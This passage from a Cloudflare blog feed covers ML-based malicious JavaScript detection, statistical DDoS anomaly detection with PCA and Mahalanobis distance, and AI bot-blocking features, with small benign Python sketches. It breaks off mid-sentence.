iteratively enhance successive model versions.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/hHw00ojXE4CdorMQI5b56/897e0e045230522478e0735c3e28ff12/6.png" />
          </figure><p><sup><i>2D visualization of scripts projected onto an embedding space, highlighting those sufficiently dissimilar from one another.</i></sup></p>
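<p>The selection loop above can be sketched in a few lines of pure Python. This is an illustrative version that assumes embeddings are already computed as plain vectors; the real pipeline generates them with an LLM and stores them in a vector database:</p>

```python
# Greedy diversity selection over precomputed embeddings (sketch).
import math

def cosine_distance(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return 1.0 - dot / (norm_a * norm_b)

def select_diverse(embeddings, threshold=0.10):
    """Keep an embedding only if its nearest already-selected
    neighbor is farther than `threshold` in cosine distance."""
    selected = []
    for emb in embeddings:
        if not selected or min(cosine_distance(emb, s) for s in selected) > threshold:
            selected.append(emb)
    return selected
```

<p>Note the first-seen bias mentioned above: the first script in a batch is always selected, and later near-duplicates are measured against it.</p>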
    <div>
      <h4>From the lab, to the real world</h4>
      <a href="#from-the-lab-to-the-real-world">
        
      </a>
    </div>
    <p>Our latest model in evaluation has both a macro accuracy and an overall malicious precision nearing 99%(!) on our test dataset. So we are done, right? Wrong! The real world is not the same as the lab: in the wild, far more variants of benign JavaScript appear. To keep prediction changes between model releases to a minimum, we follow three safeguards:</p>
    <div>
      <h5>Evaluate metrics uncertainty</h5>
      <a href="#evaluate-metrics-uncertainty">
        
      </a>
    </div>
    <p>First, we thoroughly estimate the <i>uncertainty</i> of our offline evaluation metrics. How accurate are our accuracy metrics themselves? To gauge that, we calculate the <a href="https://en.wikipedia.org/wiki/Standard_error"><u>standard error</u></a> and confidence intervals for our offline metrics (precision, recall, <a href="https://en.wikipedia.org/wiki/F-score"><u>F1 measure</u></a>). To do that, we calculate the model’s predicted scores on the test set once (the original sample), and then generate bootstrapped resamples from it. We use simple random (re-)sampling as it offers us a more conservative estimate of error than stratified or balanced sampling.</p><p>We generate 1,000 resamples, each containing 15% of the original test sample, and then calculate the metrics for each individual resample. This results in a distribution of sampled data points. We measure its mean, the standard deviation (with <a href="https://en.wikipedia.org/wiki/Standard_deviation#Corrected_sample_standard_deviation"><u>Bessel’s correction</u></a>), and finally the standard error and a <a href="https://en.wikipedia.org/wiki/Confidence_interval"><u>confidence interval</u></a> (CI) (using the percentile method, such as the 2.5 and 97.5 percentiles for a 95% CI). See below for an example of a bootstrapped distribution for precision (P), illustrating that a model’s performance is a continuum rather than a fixed value, and that it might exhibit subtly (left-)skewed tails. For some of our internally evaluated models, it can easily happen that some of the sub-sampled metrics decrease by up to 20 percentage points within a 95% confidence range. High standard errors and/or wide confidence intervals signal the need to improve the model and to expand our test set.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2x3X2oVv2EfIkLYFrcjLWK/985a685e565f759b7781821595ac4ff7/7.png" />
          </figure><p><sup><i>An evaluation metric, here precision (P), might change significantly depending on what’s exactly tested. We thoroughly estimate the metric’s standard error and confidence intervals.</i></sup></p>
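<p>The procedure can be sketched in plain Python. The 1,000 resamples at 15% and the percentile CI follow the description above, while the labeled prediction pairs below are hypothetical:</p>

```python
# Bootstrap standard error and 95% CI for precision (illustrative sketch).
import random
import statistics

def precision(pairs):
    """pairs: (true_label, predicted_positive) booleans."""
    tp = sum(1 for y, p in pairs if p and y)
    fp = sum(1 for y, p in pairs if p and not y)
    return tp / (tp + fp) if (tp + fp) else 0.0

def bootstrap_ci(pairs, n_resamples=1000, frac=0.15, seed=42):
    rng = random.Random(seed)
    k = max(1, int(len(pairs) * frac))
    scores = sorted(precision(rng.choices(pairs, k=k)) for _ in range(n_resamples))
    mean = statistics.mean(scores)
    stderr = statistics.stdev(scores)  # Bessel-corrected std of the bootstrap distribution
    ci95 = (scores[int(0.025 * n_resamples)], scores[int(0.975 * n_resamples) - 1])
    return mean, stderr, ci95

# Hypothetical test set: 90 true positives, 10 false positives, 100 true negatives
pairs = [(True, True)] * 90 + [(False, True)] * 10 + [(False, False)] * 100
mean, stderr, (lo, hi) = bootstrap_ci(pairs)
```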
    <div>
      <h5>Benchmark against massive offline unlabeled dataset</h5>
      <a href="#benchmark-against-massive-offline-unlabeled-dataset">
        
      </a>
    </div>
    <p>We run our model on the entire corpus of scripts seen by Cloudflare's network and temporarily cached in the last 90 days. By the way, that’s nearly 1 TiB and 26 million different JavaScript files! With that, we can observe the model’s behavior against real traffic, yet completely offline (to ensure no impact on production). We check the malicious prediction rate, latency, throughput, etc., and sample some of the predictions for verification and annotation.</p>
    <div>
      <h5>Review in staging and shadow mode</h5>
      <a href="#review-in-staging-and-shadow-mode">
        
      </a>
    </div>
    <p>Only after all the previous checks have cleared do we run the new candidate version in our staging environment. For major model upgrades, we also deploy them in <a href="https://cloud.google.com/architecture/guidelines-for-developing-high-quality-ml-solutions"><u>shadow mode</u></a> (log-only mode) — running on production, alongside our existing model. We study the model’s behavior for a while before finally marking it as production-ready; otherwise, we go back to the drawing board.</p>
    <div>
      <h3>AI inference at scale</h3>
      <a href="#ai-inference-at-scale">
        
      </a>
    </div>
    <p>At the time of writing, Page Shield sees an average of <i>40,000 scripts per second</i>. Many of those scripts are repeated, though. Everything on the Internet follows a <a href="https://blog.cloudflare.com/making-waf-ai-models-go-brr/#caching-inference-result"><u>Zipf's law distribution</u></a>, and JavaScript seen on the Cloudflare network is no exception. For instance, it is estimated that different versions of the <a href="https://blog.cloudflare.com/page-shield-positive-blocking-policies/#client-side-libraries"><u>Bootstrap library run on more than 20% of websites</u></a>. It would be a waste of computing resources if we repeatedly re-ran the AI model for the very same inputs — inference result caching is needed. Not to mention, GPU utilization is expensive!</p><p>The question is, what is the best way to cache the scripts? We could take a <a href="https://csrc.nist.gov/glossary/term/sha_256"><u>SHA-256</u></a> hash of the plain content as is. However, any single change in the transmitted content (comments, spacing, or a different character set) changes the SHA-256 output hash.</p><p>A better caching approach? Since we need to parse the code into syntax trees for our GNN model anyway, this tree structure and content is what we use to hash the JavaScript. As described above, we filter out nodes in the syntax tree like comments or empty statements. In addition, some irrelevant details get abstracted out in the AST (escape sequences are unescaped, the way of writing strings is normalized, unnecessary parentheses are removed since the operation order is already encoded in the tree, etc.).</p><p>Using such a tree-based approach to caching, we find that at any moment over 99.9% of reported scripts have already been seen in our network! Unless we deploy a new model with significant improvements, we don’t re-score previously seen JavaScript but just return the cached score. 
As a result, the model only needs to be called <i>fewer than 10 times per minute</i>, even during peak times!</p>
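<p>To illustrate why tree-based hashing is robust, here is a sketch using Python's own <code>ast</code> module as a stand-in for the JavaScript parser: comments, spacing, and string quoting all disappear in the parse tree, so equivalent sources hash identically.</p>

```python
# Structure-based hashing sketch: hash the dumped syntax tree, not the raw text.
import ast
import hashlib

def tree_hash(source: str) -> str:
    """SHA-256 over the normalized syntax tree of `source`."""
    tree = ast.parse(source)
    # ast.dump() normalizes comments, whitespace, and string quoting away
    return hashlib.sha256(ast.dump(tree).encode()).hexdigest()

a = tree_hash("x = 'hi'  # a comment")
b = tree_hash('x = "hi"')
c = tree_hash("x = 'bye'")
# a == b (identical trees), while c hashes differently
```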
    <div>
      <h3>Let AI help ease PCI DSS v4 compliance</h3>
      <a href="#let-ai-help-ease-pci-dss-v4-compliance">
        
      </a>
    </div>
    <p>One of the most popular use cases for deploying Page Shield is to help meet the two new client-side security requirements in PCI DSS v4 — <a href="https://assets.ctfassets.net/slt3lc6tev37/4HJex2kG7FCb1IJRC9rIhL/081fdd8b1a471def14cfd415f99e4b58/Evaluation_Page_Shield_091124_FINAL.pdf"><u>6.4.3 and 11.6.1</u></a>. These requirements make companies responsible for approving scripts used in payment pages, where payment card data could be compromised by malicious JavaScript. Both of these requirements <a href="https://blog.pcisecuritystandards.org/countdown-to-pci-dss-v4.0"><u>become effective</u></a> on March 31, 2025.</p><p>Page Shield with AI malicious JavaScript detection can be deployed with just a few clicks, especially if your website is already proxied through Cloudflare. <a href="https://www.cloudflare.com/page-shield/"><u>Sign up here</u></a> to fast track your onboarding!</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Malicious JavaScript]]></category>
            <category><![CDATA[JavaScript]]></category>
            <guid isPermaLink="false">3VQUOQBWzT8cc7oFFv003i</guid>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[Training a million models per day to save customers of all sizes from DDoS attacks]]></title>
            <link>https://blog.cloudflare.com/training-a-million-models-per-day-to-save-customers-of-all-sizes-from-ddos/</link>
            <pubDate>Wed, 23 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ In this post we will describe how we use anomaly detection to watch for novel DDoS attacks. We’ll provide an overview of how we build models which flag unusual traffic and keep our customers safe. ]]></description>
            <content:encoded><![CDATA[ <p>Our always-on DDoS protection runs inside every server across our global network. It constantly analyzes incoming traffic, looking for signals associated with previously identified DDoS attacks. We dynamically create <a href="https://developers.cloudflare.com/ddos-protection/about/how-ddos-protection-works/"><u>fingerprints</u></a> to flag malicious traffic, which is dropped when detected in high enough volume — so it never reaches its destination — keeping customer websites online.</p><p>In many cases, flagging bad traffic can be straightforward. For example, if we see too many requests to a destination with the same protocol violation, we can be fairly sure this is an automated script, rather than a surge of requests from a legitimate web browser.</p><p>Our DDoS systems are great at detecting attacks, but there’s a minor catch. Much like the human immune system, they are great at spotting attacks similar to things they have seen before. But for new and novel threats, they need a little help knowing what to look for, which is an expensive and time-consuming human endeavor.</p><p>Cloudflare protects millions of Internet properties, and we serve over 60 million HTTP requests per second on average, so trying to find unmitigated attacks in such a huge volume of traffic is a daunting task. In order to protect the smallest of companies, we need a way to find unmitigated attacks that may only be a few thousand requests per second, as even these can be enough to take smaller sites offline.</p><p>To better protect our customers, we also have a system to automatically identify unmitigated or partially mitigated DDoS attacks, so we can better shore up our defenses against emerging threats. In this post, we will introduce this anomaly detection pipeline and provide an overview of how it builds statistical models which flag unusual traffic and keep our customers safe. Let’s jump in!</p>
    <div>
      <h2>A naive volumetric model</h2>
      <a href="#a-naive-volumetric-model">
        
      </a>
    </div>
    <p>A DDoS attack, by definition, is characterized by a higher than normal volume of traffic destined for a particular destination. We can use this fact to loosely sketch out a potential approach. Let’s look at an example website, and look at the request volume over the course of a day, broken down into 1 minute intervals.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6j97IMawigCOtQEIKLzQ4n/8ab1e487a5dc8faaecc732b8fbb7d8d4/image3.png" />
          </figure><p>We can plot this same data as a histogram:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Ys3wf2GY6e5K4rEBUTDBN/5cff86a1f90ee5e0eae9ec394f2322b3/image6.png" />
          </figure><p>The data follows a bell-shaped curve, also known as a normal distribution. We can use this fact to flag observations which appear outside the usual range. By first calculating the mean and standard deviation of our dataset, we can then use these values to rate new observations by calculating how many standard deviations (or sigma) the data is from the mean.</p><p>This value is also called the z-score — a z-score of 3 is the same as 3-sigma, which corresponds to 3 standard deviations from the mean. A data point with a high enough z-score is sufficiently unusual that it might signal an attack. Since the mean and standard deviation are stationary, we can calculate a request volume threshold for each z-score value, and use traffic volumes above these thresholds to signal an ongoing attack.</p>
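<p>A minimal sketch of these volumetric thresholds (illustrative, with made-up per-minute request counts):</p>

```python
# z-score thresholds over request volume (sketch with hypothetical data).
import statistics

def sigma_threshold(counts, sigma):
    """Request volume sitting `sigma` standard deviations above the mean."""
    return statistics.mean(counts) + sigma * statistics.stdev(counts)

def z_score(counts, observation):
    """How many standard deviations `observation` is from the mean."""
    return (observation - statistics.mean(counts)) / statistics.stdev(counts)

# Hypothetical requests/minute; volume above the 3-sigma line signals an attack
counts = [90, 100, 110, 100, 100]
threshold = sigma_threshold(counts, 3)
```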
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4X5WaA5QssNRlWWaz4UUYL/05b88c9cfe52f6ba05cef7cab033d53d/image1.png" />
          </figure><p><sup><i>Trigger thresholds for z-score of 3, 4 and 5</i></sup></p><p>Unfortunately, it’s incredibly rare to see traffic that is this uniform in practice, as user load will naturally vary over a day. Here I’ve simulated some traffic for a website which runs a meal delivery service, and as you might expect it has big peaks around meal times, and low traffic overnight since it only operates in a single country.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Pk6sFmz8lqjUJrdTev8Xw/194436196eddbbb11576b74f1515d6c6/image2.png" />
          </figure><p>Our volume data no longer follows a normal distribution and our 3-sigma threshold is now much further away, so smaller attacks could pass undetected.</p><p>Many websites elastically scale their underlying hardware based upon anticipated load to save on costs. In the example above the website operator would run far fewer servers overnight, when the anticipated load is low, to save on running costs. This makes the website more vulnerable to attacks during off-peak hours as there would be less hardware to absorb them. An attack as low as a few hundred requests per minute may be enough to overwhelm the site early in the morning, even though the peak-time infrastructure could easily absorb this volume.</p><p>This approach relies on traffic volume being stable over time, meaning it’s roughly flat throughout the day, but this is rarely true in practice. Even when it is true, benign increases in traffic are common, such as an e-commerce site running a Black Friday sale. In this situation, a website would expect a surge in traffic that our model wouldn’t anticipate, and we may incorrectly flag real shoppers as attackers.</p><p>It turns out this approach makes too many naive assumptions about what traffic should look like, so it’s impossible to choose an appropriate sigma threshold which works well for all customers.</p>
    <div>
      <h2>Time series forecasting</h2>
      <a href="#time-series-forecasting">
        
      </a>
    </div>
    <p>Let’s continue with trying to determine a volumetric baseline for our meal delivery example. A reasonable assumption we could add is that yesterday’s traffic shape should approximate the expected shape of traffic today. This idea is called “seasonality”. Weekly seasonality is also pretty common, i.e. websites see more or less traffic on certain weekdays or on weekends.</p><p>There are many methods designed to analyze a dataset, unpick the varying horizons of seasonality within it, and then build an appropriate predictive model. We won’t go into them here but reading about <a href="https://en.wikipedia.org/wiki/Autoregressive_integrated_moving_average"><u>Seasonal ARIMA (SARIMA)</u></a> is a good place to start if you are looking for further information.</p><p>There are three main challenges that make SARIMA methods unsuitable for our purposes. First is that in order to get a good idea of seasonality, you need a lot of data. To predict weekly seasonality, you need at least a few weeks worth of data. We’d require a massive dataset to predict monthly, or even annual, patterns (such as Black Friday). This means new customers wouldn’t be protected until they’d been with us for multiple years, so this isn’t a particularly practical approach.</p><p>The second issue is the cost of training models. In order to maintain good accuracy, time series models need to be frequently retrained. The exact frequency varies between methods, but in the worst cases, a model is only good for 2–3 inferences, meaning we’d need to retrain all our models every 10–20 minutes. This is feasible, but it’s incredibly wasteful.</p><p>The third hurdle is the hardest to work around, and is the reason why a purely volumetric model doesn’t work. Most websites experience completely benign spikes in traffic that lie outside prior norms. Flash sales are one such example, or 1,000,000 visitors driven to a site from Reddit, or a Super Bowl commercial.</p>
    <div>
      <h2>A better way?</h2>
      <a href="#a-better-way">
        
      </a>
    </div>
    <p>So if volumetric modeling won’t work, what can we do instead? Fortunately, volume isn’t the only axis we can use to measure traffic. Consider the end users’ browsers, for example. It would be reasonable to assume that over a given time interval, the proportion of users across the top 5 browsers would remain reasonably stationary, or at least within a predictable range. More importantly, this proportion is unlikely to change too much during benign traffic surges.</p><p>Through careful analysis we were able to discover about a dozen such variables for a given zone, each with the following properties: </p><ul><li><p>They follow a normal distribution</p></li><li><p>They aren’t correlated, or are only loosely correlated with volume</p></li><li><p>They deviate from the underlying normal distribution during “under attack” events</p></li></ul><p>Recall our initial volume model, where we used z-score to define a cutoff. We can expand this same idea to multiple dimensions. We have a dozen different time series (each feature is a single time series), which we can imagine as a cloud of points in 12 dimensions. Here is a sample showing 3 such features, with each point representing the traffic readings at a different point in time. Note that both graphs show the same cloud of points from two different angles.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5idkNYYgL0IhY8d2HapYud/f3696ec7fb91f8641a04ba261d0cf673/image4.png" />
          </figure><p>To use our z-score analogy from before, we’d want our points to be spherical, since our multidimensional z-score is then just the distance from the centre of the cloud. We could then use this distance to define a cutoff threshold for attacks.</p><p>For several reasons, a perfect sphere is unlikely in practice. Our various features measure different things, so they have very different scales of ‘normal’. One property might vary between 100-300 whereas another property might usually occupy the interval 0-1. A change of 3 in this latter property would be a significant anomaly, whereas in the first this would just be within the normal range.</p><p>More subtly, two or more axes may be correlated, so an increase in one is usually mirrored with a proportional increase/decrease in another dimension. This turns our sphere into an off-axis disc shape, as pictured above.</p><p>Fortunately, we have a couple of mathematical tricks up our sleeve. The first is scale normalization. In each of our n dimensions, we subtract the mean, and divide by the standard deviation. This makes all our dimensions the same size and centres them around zero. This gives a multidimensional analogue of z-score, but it won’t fix the disc shape.</p><p>What we can do is figure out the orientation and dimensions of the disc, and for this we use a tool called <a href="https://en.wikipedia.org/wiki/Principal_component_analysis"><u>Principal Component Analysis (PCA)</u></a>. This lets us reorient our disc, and rescale the axes according to their size, to make them all the same.</p><p>Imagine grabbing the disc out of the air, then drawing new X and Y axes on the top surface, with the origin at the center of the disc. Our new Z-axis is the thickness of the disc. We can compare the thickness to the diameter of the disc, to give us a scaling factor for the Z direction. 
Imagine stretching the disc along the z-axis until it’s as tall as the length across the diameter.</p><p>In reality there’s nothing to say that X &amp; Y have to be the same size either, but hopefully you get the general idea. PCA lets us draw new axes along these lines of correlation in an arbitrary number of dimensions, and convert our n-dimensional disc into a nicely behaved sphere of points (technically an n-dimensional sphere).</p><p>Having done all this work, we can uniquely define a coordinate transformation which takes any measurement from our raw features, and tells us where it should lie in the sphere, and since all our dimensions are the same size we can generate an anomaly score purely based on its distance from the centre of the cloud.</p><p>As a final trick, we can apply one more scaling operation to ensure the sphere for dataset A is the same size as the sphere generated from dataset B, meaning we can do this same process for any traffic data and define a cutoff distance λ which is the same across all our models. Rather than fine-tuning models for each individual customer zone, we can tune this to a value which applies globally.</p><p>Another name for this measurement is <a href="https://en.wikipedia.org/wiki/Mahalanobis_distance"><u>Mahalanobis distance</u></a>. (Inclined readers can understand this equivalence by considering the role of the covariance matrix in PCA and Mahalanobis distance. Further discussion can be found on <a href="https://stats.stackexchange.com/questions/166525/is-mahalanobis-distance-equivalent-to-the-euclidean-one-on-the-pca-rotated-data"><u>this</u></a> StackExchange post.) We further tune the process to discard dimensions with little variance — if our disc is too thin we discard the thickness dimension. In practice, such dimensions were too sensitive to be useful.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1OcPc7zoehsizwzPEkD1Fc/094bd59ca6d6aba3c301fd74f12d580a/image5.png" />
          </figure><p>We’re left with a multidimensional analogue of the z-score we started with, but this time our variables aren’t correlated with peacetime traffic volume. Above we show 2 output dimensions, with coloured circles which show Mahalanobis distances of 4, 5 and 6. Anything outside the green circle will be classified as an attack.</p>
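<p>The whole transformation (center, rotate onto principal axes with PCA, rescale each axis, then take a plain Euclidean distance) can be sketched with NumPy; the resulting score coincides with the Mahalanobis distance. The feature matrix here is an arbitrary placeholder, not real traffic data:</p>

```python
# Mahalanobis distance via PCA whitening (illustrative sketch).
import numpy as np

def anomaly_scores(X):
    """Mahalanobis distance of each row of X from the cloud's center."""
    centered = X - X.mean(axis=0)
    cov = np.cov(centered, rowvar=False)
    # Eigendecomposition of the covariance = principal axes and their variances
    eigvals, eigvecs = np.linalg.eigh(cov)
    rotated = centered @ eigvecs              # reorient the "disc"
    whitened = rotated / np.sqrt(eigvals)     # stretch it into a sphere
    return np.linalg.norm(whitened, axis=1)   # Euclidean distance = score
```

<p>Discarding the low-variance dimensions mentioned above would amount to dropping the columns with the smallest eigenvalues before taking the norm.</p>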
    <div>
      <h2>How we train ~1 million models daily to keep customers safe</h2>
      <a href="#how-we-train-1-million-models-daily-to-keep-customers-safe">
        
      </a>
    </div>
    <p>The approach we’ve outlined is incredibly parallelizable: a single model requires only the traffic data for that one website, and the datasets needed can be quite small. We use 4 weeks of training data chunked into 5-minute intervals, which is only ~8k rows/website.</p><p>We run all our training and inference in an Apache Airflow deployment in Kubernetes. Due to the parallelizability, we can scale horizontally as needed. On average, we can train about 3 models/second/thread. We currently retrain models every day, but we’ve observed very little day-to-day model drift (i.e. yesterday’s model behaves much like today’s), so training frequency may be reduced in the future.</p><p>We don’t consider it necessary to build models for all our customers; instead, we train models for a large sample of representative customers, including a large number on the Free plan. The goal is to identify attacks for further study which we then use to tune our existing DDoS systems for all customers.</p>
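<p>The quoted dataset size is straightforward to verify:</p>

```python
# 4 weeks of traffic chunked into 5-minute intervals, per website
rows_per_website = 4 * 7 * 24 * (60 // 5)  # = 8064, i.e. the ~8k rows above
```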
    <div>
      <h2>Join us!</h2>
      <a href="#join-us">
        
      </a>
    </div>
    <p>If you’ve read this far you may have questions, like “how do you filter attacks from your training data?” or you may have spotted a handful of other technical details which I’ve elided to keep this post accessible to a general audience. If so, you would fit in well here at Cloudflare. We’re helping to build a better Internet, and we’re <a href="https://www.cloudflare.com/careers/jobs/?title=data+scientist"><u>hiring</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[DDoS]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <guid isPermaLink="false">4awe2vvz8flXFLuz3BGm7j</guid>
            <dc:creator>Nick Wood</dc:creator>
            <dc:creator>Manish Arora</dc:creator>
        </item>
        <item>
            <title><![CDATA[AI Everywhere with the WAF Rule Builder Assistant, Cloudflare Radar AI Insights, and updated AI bot protection]]></title>
            <link>https://blog.cloudflare.com/bringing-ai-to-cloudflare/</link>
            <pubDate>Fri, 27 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ This year for Cloudflare’s birthday, we’ve extended our AI Assistant capabilities to help you build new WAF rules, added new AI bot & crawler traffic insights to Radar, and given customers new AI bot  ]]></description>
            <content:encoded><![CDATA[ <p>The continued growth of AI has fundamentally changed the Internet over the past 24 months. AI is increasingly ubiquitous, and Cloudflare is leaning into the new opportunities and challenges it presents in a big way. This year for Cloudflare’s birthday, we’ve extended our AI Assistant capabilities to help you build new WAF rules, added AI bot traffic insights on Cloudflare Radar, and given customers new <a href="https://www.cloudflare.com/learning/ai/how-to-block-ai-crawlers/">AI bot blocking capabilities</a>.  </p>
    <div>
      <h2>AI Assistant for WAF Rule Builder</h2>
      <a href="#ai-assistant-for-waf-rule-builder">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5RYC4wmCDbs0axY92FfkFk/a728906cb6a902dd1c78ec93a0f650c2/BLOG-2564_1.png" />
          </figure><p>At Cloudflare, we’re always listening to your feedback and striving to make our products as user-friendly and powerful as possible. One area where we've heard your feedback loud and clear is in the complexity of creating custom and rate-limiting rules for our Web Application Firewall (WAF). With this in mind, we’re excited to introduce a new feature that will make rule creation easier and more intuitive: the AI Assistant for WAF Rule Builder. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7avSjubqlfg7L8ymKEztgk/7c3c31e50879ec64bccc384bdfcd5524/BLOG-2564_2.png" />
          </figure><p>By simply entering a natural language prompt, you can generate a custom or rate-limiting rule tailored to your needs. For example, instead of manually configuring complex rule-matching criteria, you can now type something like, "Match requests with low bot score," and the assistant will generate the rule for you. It’s not about creating the perfect rule in one step, but giving you a strong foundation that you can build on. </p><p>The assistant will be available in the Custom and Rate Limit Rule Builder for all WAF users. We’re launching this feature in Beta for all customers, and we encourage you to give it a try. We’re looking forward to hearing your feedback (via the UI itself) as we continue to refine and enhance this tool to meet your needs.</p>
    <div>
      <h2>AI bot traffic insights on Cloudflare Radar</h2>
      <a href="#ai-bot-traffic-insights-on-cloudflare-radar">
        
      </a>
    </div>
    <p>AI platform providers use bots to crawl and scrape websites, vacuuming up data to use for model training. This is frequently done without the permission of, or a business relationship with, the content owners and providers. In July, Cloudflare urged content owners and providers to <a href="https://blog.cloudflare.com/declaring-your-aindependence-block-ai-bots-scrapers-and-crawlers-with-a-single-click/"><u>“declare their AIndependence”</u></a>, providing them with a way to block AI bots, <a href="https://www.cloudflare.com/learning/ai/how-to-prevent-web-scraping/">scrapers</a>, and crawlers with a single click. In addition to this so-called “easy button” approach, sites can provide more specific guidance to these bots about what they are and are not allowed to access through directives in a <a href="https://www.cloudflare.com/en-gb/learning/bots/what-is-robots-txt/"><u>robots.txt</u></a> file. Regardless of whether a customer chooses to block or allow requests from AI-related bots, Cloudflare has insight into request activity from these bots, and associated traffic trends over time.</p><p>Tracking traffic trends for AI bots can help us better understand their activity over time — which are the most aggressive and have the highest volume of requests, which launch crawls on a regular basis, etc. The new <a href="https://radar.cloudflare.com/traffic#ai-bot-crawler-traffic"><b><u>AI bot &amp; crawler traffic </u></b><u>graph on Radar’s Traffic page</u></a> provides insight into these traffic trends gathered over the selected time period for the top known AI bots. The associated list of bots tracked here is based on the <a href="https://github.com/ai-robots-txt/ai.robots.txt"><u>ai.robots.txt list</u></a>, and will be updated with new bots as they are identified. 
<a href="https://developers.cloudflare.com/api/operations/radar-get-ai-bots-timeseries-group-by-user-agent"><u>Time series</u></a> and <a href="https://developers.cloudflare.com/api/operations/radar-get-ai-bots-summary-by-user-agent"><u>summary</u></a> data is available from the Radar API as well. (Traffic trends for the full set of AI bots &amp; crawlers <a href="https://radar.cloudflare.com/explorer?dataSet=ai.bots"><u>can be viewed in the new Data Explorer</u></a>.)</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5tYefQaBhTPYpqZPtE6KPu/f60694d0b24de2acba13fe0944589885/BLOG-2564_3.png" />
          </figure>
    <div>
      <h2>Blocking more AI bots</h2>
      <a href="#blocking-more-ai-bots">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/UiFu8l6K4Pm3ulxTK3XU0/541d109e29a9ae94e4792fdf94f7e4aa/BLOG-2564_4.png" />
          </figure><p>For Cloudflare’s birthday, we’re following up on our previous blog post, <a href="https://blog.cloudflare.com/declaring-your-aindependence-block-ai-bots-scrapers-and-crawlers-with-a-single-click/"><i><u>Declaring Your AIndependence</u></i></a>, with an update on the new detections we’ve added to stop AI bots. Customers who haven’t already done so can simply <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/bots/configure"><u>click the button</u></a> to block AI bots to gain more protection for their website. </p>
    <div>
      <h3>Enabling dynamic updates for the AI bot rule</h3>
      <a href="#enabling-dynamic-updates-for-the-ai-bot-rule">
        
      </a>
    </div>
    <p>The old button allowed customers to block <i>verified</i> AI crawlers: those that respect robots.txt and crawl-rate limits, and don’t try to hide their behavior. We’ve added new crawlers to that list, but we’ve also expanded the previous rule to include 27 signatures (and counting) of AI bots that <i>don’t </i>follow the rules. We want to say “thank you” to everyone who took the time to use our “<a href="https://docs.google.com/forms/d/14bX0RJH_0w17_cAUiihff5b3WLKzfieDO4upRlo5wj8"><u>tip line</u></a>” to point us towards new AI bots. These tips have been extremely helpful in finding bots that would not otherwise have been on our radar so quickly. </p><p>Each bot we’ve added also goes into our “Definitely automated” definition. So, if you’re a self-service plan customer using <a href="https://blog.cloudflare.com/super-bot-fight-mode/"><u>Super Bot Fight Mode</u></a>, you’re already protected. Enterprise Bot Management customers will see more requests shift from the “Likely Bot” range to the “Definitely automated” range, which we’ll discuss more below.</p><p>Under the hood, we’ve converted this rule logic to a <a href="https://developers.cloudflare.com/waf/managed-rules/"><u>Cloudflare managed rule</u></a> (the same framework that powers our WAF). This enables our security analysts and engineers to safely push updates to the rule in real-time, similar to how new WAF rule changes are rapidly delivered to ensure our customers are protected against the latest CVEs. If you haven’t logged back into the Bots dashboard since the previous version of our AI bot protection was announced, click the button again to update to the latest protection. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2tI8Yqxt1S0UPapImb32J4/6cb9e9bf423c370383edb820e5722929/BLOG-2564_5.png" />
          </figure>
    <div>
      <h3>The impact of new fingerprints on the model </h3>
      <a href="#the-impact-of-new-fingerprints-on-the-model">
        
      </a>
    </div>
    <p>One hidden beneficiary of fingerprinting new AI bots is our ML model. <a href="https://blog.cloudflare.com/cloudflare-bot-management-machine-learning-and-more/"><u>As we’ve discussed before</u></a>, our global ML model uses supervised machine learning and greatly benefits from more sources of labeled bot data. Below, you can see how well our ML model recognized these requests as automated, before and after we updated the button and added the new rules. To keep things simple, we have shown only the top 5 bots by request volume on the chart. With the introduction of our new managed rule, we have observed an improvement in our detection capabilities for the majority of these AI bots. Button v1 represents the old option that let customers block only verified AI crawlers, while Button v2 is the newly introduced feature that includes managed rule detections.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2CZVGyDCp9ZtMrZdIi49fE/aacd04d240e9348b5a9b65bad4b470e2/BLOG-2564_6.jpg" />
          </figure><p>So how did we make our detections more robust? As we have mentioned before, sometimes <a href="https://blog.cloudflare.com/cloudflare-bot-management-machine-learning-and-more/"><i><u>a single attribute can give a bot away</u></i></a>. We developed a set of heuristics tailored to these AI bots, enabling us to classify them quickly and accurately. Although our ML model was already detecting the vast majority of these requests, the additional heuristics have produced a noticeable increase in detection rates for each bot and give us greater confidence that we score these requests correctly. Moving from a purely machine learning approach to one that also incorporates heuristics offers several advantages, including faster detection times and greater certainty in classification. While deploying a machine learning model is complex and time-consuming, new heuristics can be created in minutes. </p><p>The initial launch of the AI bots block button was well-received and is now used by over 133,000 websites, with significant adoption even among our Free tier customers. The newly updated button, launched on August 20, 2024, is rapidly gaining traction. Over 90,000 zones have already adopted the new rule, with approximately 240 new sites integrating it every hour. Overall, we are now helping to protect the intellectual property of more than 146,000 sites from AI bots, and we are currently blocking 66 million requests 